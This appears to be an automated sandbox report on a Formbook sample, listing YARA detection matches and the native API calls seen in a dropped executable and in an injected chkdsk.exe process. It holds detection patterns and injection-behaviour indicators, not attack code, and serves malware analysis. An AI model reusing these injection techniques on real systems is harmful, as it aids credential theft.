          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: inlaww321345.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.idczzzzbpy.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.idczzzzbpy.exe.700000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.7.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.9.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.7.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.idczzzzbpy.exe.700000.1.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.5.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.0.idczzzzbpy.exe.400000.9.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.idczzzzbpy.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507327019.0000000000970000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319433695.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.246864810.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.289205800.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000000.306971961.000000000AC3C000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319619508.0000000001180000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507830951.0000000000F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.251263067.0000000000700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000000.248745140.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000010.00000002.507774952.0000000000F20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.319548614.0000000001150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\inlaww321345.exeCode function: 0_2_00403646 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403646
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: String function: 053BB150 appears 48 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: String function: 003B4599 appears 38 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: String function: 0166B150 appears 136 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: String function: 003B2400 appears 54 times
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A360 NtCreateFile,2_2_0041A360
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A410 NtReadFile,2_2_0041A410
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A490 NtClose,2_2_0041A490
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A540 NtAllocateVirtualMemory,2_2_0041A540
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A35A NtCreateFile,2_2_0041A35A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A45A NtReadFile,2_2_0041A45A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A492 NtClose,2_2_0041A492
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_0041A53A NtAllocateVirtualMemory,2_2_0041A53A
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_016A9910
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A99A0 NtCreateSection,LdrInitializeThunk,2_2_016A99A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9860 NtQuerySystemInformation,LdrInitializeThunk,2_2_016A9860
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9840 NtDelayExecution,LdrInitializeThunk,2_2_016A9840
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A98F0 NtReadVirtualMemory,LdrInitializeThunk,2_2_016A98F0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9A50 NtCreateFile,LdrInitializeThunk,2_2_016A9A50
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9A20 NtResumeThread,LdrInitializeThunk,2_2_016A9A20
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9A00 NtProtectVirtualMemory,LdrInitializeThunk,2_2_016A9A00
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9540 NtReadFile,LdrInitializeThunk,2_2_016A9540
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A95D0 NtClose,LdrInitializeThunk,2_2_016A95D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9710 NtQueryInformationToken,LdrInitializeThunk,2_2_016A9710
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A97A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_016A97A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9780 NtMapViewOfSection,LdrInitializeThunk,2_2_016A9780
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9660 NtAllocateVirtualMemory,LdrInitializeThunk,2_2_016A9660
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A96E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_016A96E0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9950 NtQueueApcThread,2_2_016A9950
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A99D0 NtCreateProcessEx,2_2_016A99D0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016AB040 NtSuspendThread,2_2_016AB040
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9820 NtEnumerateKey,2_2_016A9820
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A98A0 NtWriteVirtualMemory,2_2_016A98A0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9B00 NtSetValueKey,2_2_016A9B00
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016AA3B0 NtGetContextThread,2_2_016AA3B0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9A10 NtQuerySection,2_2_016A9A10
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9A80 NtOpenDirectoryObject,2_2_016A9A80
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9560 NtWriteFile,2_2_016A9560
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9520 NtWaitForSingleObject,2_2_016A9520
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016AAD30 NtSetContextThread,2_2_016AAD30
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A95F0 NtQueryInformationFile,2_2_016A95F0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9760 NtOpenProcess,2_2_016A9760
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016AA770 NtOpenThread,2_2_016AA770
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9770 NtSetInformationFile,2_2_016A9770
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9730 NtQueryVirtualMemory,2_2_016A9730
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016AA710 NtOpenProcessToken,2_2_016AA710
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9FE0 NtCreateMutant,2_2_016A9FE0
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9670 NtQueryInformationProcess,2_2_016A9670
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9650 NtQueryValueKey,2_2_016A9650
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A9610 NtEnumerateValueKey,2_2_016A9610
          Source: C:\Users\user\AppData\Local\Temp\idczzzzbpy.exe, Code function: 2_2_016A96D0 NtCreateKey,2_2_016A96D0
          Source: C:\Windows\SysWOW64\chkdsk.exe, Code function: 16_2_053F9540 NtReadFile,LdrInitializeThunk,16_2_053F9540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F95D0 NtClose,LdrInitializeThunk,16_2_053F95D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9710 NtQueryInformationToken,LdrInitializeThunk,16_2_053F9710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9780 NtMapViewOfSection,LdrInitializeThunk,16_2_053F9780
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9FE0 NtCreateMutant,LdrInitializeThunk,16_2_053F9FE0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9660 NtAllocateVirtualMemory,LdrInitializeThunk,16_2_053F9660
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9650 NtQueryValueKey,LdrInitializeThunk,16_2_053F9650
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F96E0 NtFreeVirtualMemory,LdrInitializeThunk,16_2_053F96E0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F96D0 NtCreateKey,LdrInitializeThunk,16_2_053F96D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9910 NtAdjustPrivilegesToken,LdrInitializeThunk,16_2_053F9910
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F99A0 NtCreateSection,LdrInitializeThunk,16_2_053F99A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9860 NtQuerySystemInformation,LdrInitializeThunk,16_2_053F9860
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9840 NtDelayExecution,LdrInitializeThunk,16_2_053F9840
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A50 NtCreateFile,LdrInitializeThunk,16_2_053F9A50
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FAD30 NtSetContextThread,16_2_053FAD30
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9520 NtWaitForSingleObject,16_2_053F9520
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9560 NtWriteFile,16_2_053F9560
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F95F0 NtQueryInformationFile,16_2_053F95F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9730 NtQueryVirtualMemory,16_2_053F9730
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FA710 NtOpenProcessToken,16_2_053FA710
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FA770 NtOpenThread,16_2_053FA770
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9770 NtSetInformationFile,16_2_053F9770
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9760 NtOpenProcess,16_2_053F9760
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F97A0 NtUnmapViewOfSection,16_2_053F97A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9610 NtEnumerateValueKey,16_2_053F9610
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9670 NtQueryInformationProcess,16_2_053F9670
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9950 NtQueueApcThread,16_2_053F9950
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F99D0 NtCreateProcessEx,16_2_053F99D0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9820 NtEnumerateKey,16_2_053F9820
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FB040 NtSuspendThread,16_2_053FB040
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F98A0 NtWriteVirtualMemory,16_2_053F98A0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F98F0 NtReadVirtualMemory,16_2_053F98F0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9B00 NtSetValueKey,16_2_053F9B00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053FA3B0 NtGetContextThread,16_2_053FA3B0
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A20 NtResumeThread,16_2_053F9A20
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A10 NtQuerySection,16_2_053F9A10
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A00 NtProtectVirtualMemory,16_2_053F9A00
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_053F9A80 NtOpenDirectoryObject,16_2_053F9A80
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A360 NtCreateFile,16_2_0098A360
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A490 NtClose,16_2_0098A490
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A410 NtReadFile,16_2_0098A410
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A540 NtAllocateVirtualMemory,16_2_0098A540
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A35A NtCreateFile,16_2_0098A35A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A492 NtClose,16_2_0098A492
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A45A NtReadFile,16_2_0098A45A
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 16_2_0098A53A NtAllocateVirtualMemory,16_2_0098A53A
